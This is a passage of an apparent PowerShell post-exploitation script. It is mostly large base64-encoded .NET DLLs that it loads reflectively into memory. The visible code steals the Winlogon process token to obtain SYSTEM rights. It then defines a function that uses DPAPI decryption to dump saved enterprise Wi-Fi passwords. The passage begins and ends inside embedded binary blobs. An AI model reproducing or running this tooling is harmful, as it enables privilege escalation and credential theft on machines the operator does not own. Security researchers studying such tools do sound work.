AYAUAXFABYA8AHFAAYQiwLMAAYGGALFAFaAGAXRAFaAEQPRAFaAWgLRAFaACQbRAFaASALRAFaAMgPRAFaAlQLRAFaAUgfRAFaAIALRAFaA6QXRAFaA+AXRAFaA0QXRAFaAzgTRAAAAAACAAJEguQTVAAEAAAAAAIAAliBgB94ABABQIAAAAACWAGAH5gAHAAAAAACAAJEgtAXuAAkAAAAAAIAAliBzBfYADQAAAAAAgACRIGQFNgAQAAAAAACAAJEg1Ab+ABIAAAAAAIAAkSBsBw0BGQAAAAAAgACWIPsEEQEZAHAgAAAAAJYAZwIbARwATCEAAAAAlgCFAhsBHQAgIgAAAACWAJwFIAEeAK8iAAAAAIYYNwYGAB8AuCIAAAAAkRg9BiUBHwB6IwAAAACRGD0GJQEfAAAAAQDzAgAAAgAAAwIAAwB+AgAAAQBEBwAAAgDkAgAAAwA+AgAAAQAyAgAAAgAwBwAgAAAAAAAAAQDWAgAAAgA2BwIAAwDCAgAAAQC6AgAAAgC+AAAAAwClAgAAAQDOAgAAAgCCBQAgAAAAAAAAAQDCAgAgAgC/BgAAAwApAwAABAAJBwAABQAbAwIABgD1BgAAAQDFBQAAAgCsBgIAAwCFBwAAAQCLAgAAAQCLAgAAAQB6AgkANwYBABEANwYGABkANwYKACkANwYQADEANwYQADkANwYQAEEANwYQAEkANwYQAFEANwYQAFkANwYQAGEANwYVAGkANwYQAHEANwYQAHkANwYQAJkANwYGAIkANwIeAKkAMgYzAKkArgc2ALEA2gRSAIEANwYGAAgABAByAAkATAByAAkAUAB3AAkAVAB8AAkAWACBAAkAgACGAAkAhAByAAkAiAB3AAkAjACLAAkAkACQAAkAlACVAAkAmACaAAkAnACfAAkAoACkAAkApACpAAkAqACuAAkArACzAAkAsAC4AC4ACwApAS4AEwAyAS4AGwBRAS4AIwBaAS4AKwB1AS4AMwB1AS4AOwB1AS4AQwBaAS4ASwB7AS4AUwB1AS4AWwB1AS4AYwCTAS4AawC9AS4AcwDKAeMAewByABMAwAAlAMAAKQDAADQAvQA8AL0AGgAiADwAXgAcBSkFAAEDALkEAQBAAQUAYAcCAEABCQC0BQEAAAELAHMFAQBAAQ0AZAUBAEABDwDUBgEAQAERAGwHAgBAARMA+wQBAASAAAABAAAAAAAAAAAAAAAAANsAAAAEAAAAAAAAAAAAAABpACkCAAAAAAQAAAAAAAAAAAAAAGkAWAUAAAAAAwACAAQAAgAFAAIABgACAAcAAgAnAFkAAAAAPE1vZHVsZT4AVE9LRU5fUkVBRABTVEFOREFSRF9SSUdIVFNfUkVBRABTRV9QUklWSUxFR0VfRU5BQkxFRABTVEFOREFSRF9SSUdIVFNfUkVRVUlSRUQAU0VfUFJJVklMRUdFX1JFTU9WRUQAVE9LRU5fQURKVVNUX1NFU1NJT05JRABMVUlEAFRPS0VOX1FVRVJZX1NPVVJDRQBUT0tFTl9EVVBMSUNBVEUAVE9LRU5fSU1QRVJTT05BVEUAU0VDVVJJVFlfSU1QRVJTT05BVElPTl9MRVZFTABJbXBlcnNvbmF0aW9uVG9rZW5ETEwAUFJPQ0VTU19RVUVSWV9JTkZPUk1BVElPTgBUT0tFTl9QUklWSUxFR0VTAFRPS0VOX0FESlVTVF9QUklWSUxFR0VTAExVSURfQU5EX0FUVFJJQlVURVMAVE9LRU5fQURKVVNUX0dST1VQUwBUT0tFTl9BTExfQUNDRVNTAFNFX1BSSVZJTEVHRV9VU0VEX0ZPUl9BQ0NFU1MAUFJJVklMRUdFX1NFVABUT0tFTl9BREpVU1RfREVGQVVMVABTRV9QUklWSUxFR0VfRU5BQkxFRF9CWV9ERUZBVUxUAEFOWVNJWkVfQVJSQVkAVE9LRU5fQVNTSUdOX1BSSU1BUlkAUFJJVklMRUdFX1NFVF9BTExfTkVDRVNTQVJZAFRPS0VOX1FVRVJZAHZhbHVlX18AU2V0UXVvdGEAbXNjb3JsaWIAcHJvYwBnZXRfSWQAcHJvY2Vzc0lkAFZpcnR1YWxNZW1vcnlSZWFkAENyZWF0ZVRocmVhZABJc1ByaXZpbGVnZUVuYWJsZWQAcGlkAGxwTHVpZABFbmFibGVQcml2aWxlZ2UARHVwbGljYXRlSGFuZGxlAER1cGxpY2F0ZVRva2VuSGFuZGxlAEV4aXN0aW5nVG9rZW5IYW5kbGUAcEhhbmRsZQBQcm9jZXNzSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwU3lzdGVtTmFtZQBscE5hbWUAVmFsdWVUeXBlAFRlcm1pbmF0ZQBQcmV2aW91c1N0YXRlAE5ld1N0YXRlAFZpcnR1YWxNZW1vcnlXcml0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBMb29rdXBQcml2aWxlZ2VWYWx1ZQBTeW5jaHJvbml6ZQBTaXplT2YAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBQcml2aWxlZ2VDaGVjawB6YzAwbABNYXJzaGFsAEFsbABhZHZhcGkzMi5kbGwAa2VybmVsMzIuZGxsAEltcGVyc29uYXRpb25Ub2tlbkRMTC5kbGwAQ29udHJvbABTeXN0ZW0ARW51bQBTZXRUaHJlYWRUb2tlbgBEdXBsaWNhdGVUb2tlbgBoVG9rZW4ASW1wZXJzb25hdGlvblRva2VuAEltcGVyc29uYXRlUHJvY2Vzc1Rva2VuAE9wZW5Qcm9jZXNzVG9rZW4AQ2xpZW50VG9rZW4AUXVlcnlMaW1pdGVkSW5mb3JtYXRpb24AU2V0SW5mb3JtYXRpb24AUXVlcnlJbmZvcm1hdGlvbgBWaXJ0dWFsTWVtb3J5T3BlcmF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAFplcm8ALmN0b3IALmNjdG9yAEludFB0cgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZ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")) | Out-Null 32 | Write-Verbose "DLL has been reflected." 33 | } 34 | 35 | if(-not [zc00l.ImpersonationToken]::ImpersonateProcessToken((Get-Process Winlogon).Id)) 36 | { 37 | Write-Output "Could not Impersonate Token! Maybe you are not Local Admin?"; 38 | return; 39 | } 40 | } 41 | 42 | function Check-System 43 | { 44 | if([Environment]::Username -eq "SYSTEM") 45 | { 46 | return $true 47 | } 48 | return $false 49 | } 50 | 51 | function Get-WlanEnterprisePassword 52 | { 53 | 54 | if([Environment]::Username -ne "SYSTEM") 55 | { 56 | # Only SYSTEM user can dump the first stage decryption. 57 | Get-System 58 | if(-not (Check-System)) 59 | { 60 | Write-Output "Only SYSTEM can dump DPAPI secrets!" 61 | return 62 | } 63 | } 64 | 65 | # This DLL contains Windows API RevertToSelf() function 66 | if(-not ([System.Management.Automation.PSTypeName]'Revert').Type) 67 | { 68 | [Reflection.Assembly]::Load([Convert]::FromBase64String("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")) | Out-Null 69 | } 70 | 71 | # This DLL contains Windows DPAPI UnprotectData() function 72 | if(-not ([System.Management.Automation.PSTypeName]'DPAPI').Type) 73 | { 74 | # DPAPI.dll 75 | [Reflection.Assembly]::Load([Convert]::FromBase64String("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